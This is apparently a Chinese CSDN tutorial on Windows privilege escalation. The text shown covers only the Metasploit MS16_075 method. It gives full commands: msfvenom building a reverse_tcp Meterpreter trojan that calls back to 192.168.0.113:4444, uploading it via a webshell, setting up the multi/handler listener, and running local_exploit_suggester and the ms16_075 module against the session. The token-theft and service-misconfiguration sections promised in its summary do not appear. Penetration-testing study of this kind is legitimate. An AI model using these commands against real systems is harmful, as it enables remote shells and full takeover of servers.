Windows提权---MSF/令牌窃取/系统服务权限配置错误提权

本文介绍了Windows系统权限提升的三种方法:利用MSF进行MS16_075提权,通过令牌窃取(如MSF伪造令牌、烂土豆提权)以及系统服务权限配置错误(如CVE-2019-1322)进行提权。详细阐述了每种方法的原理和操作步骤,涉及Meterpreter Shell、令牌的随机性和PowerUp、PrivescCheck等工具。
摘要由CSDN通过智能技术生成

提权是指把普通用户的权限进行提升至高权限的过程,也叫特权提升

在渗透测试中,通过是各种漏洞提升已获取的webshell权限以夺得服务器权限

一、MSF权限提升

MSF权限提升思路:

Msfvenom生成后门来反弹连接msf,查找目标有哪些可利用的漏洞然后进行提权...

MSF进行MS16_075提权

步骤一:使用Msfvenom生成木马...并通过WebShell上传至目标服务器...

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.113 lport=4444 -f exe >s.exe

步骤二:在MSF进行监听....

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.113
set lport 4444
exploit

步骤三:运行木马,获取反弹的Meterpreter Shell...

 上传木马并运行

步骤四:在MeterpreterShell中运行POST模块来查询补丁安装信息....(可选操作)

run post/windows/gather/enum_patches

步骤五:获取提权EXP... 

background
use post/multi/recon/local_exploit_suggester
set session 1
exploit

步骤六:选择以上结果中的随意EXP...不一定那个能用...

search ms16_075  #获取模块相关信息
use 1            #调用搜索出来的第一个模块
set session 1    #在模块中设置进行提权的会话
exploit          #开始提权...

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值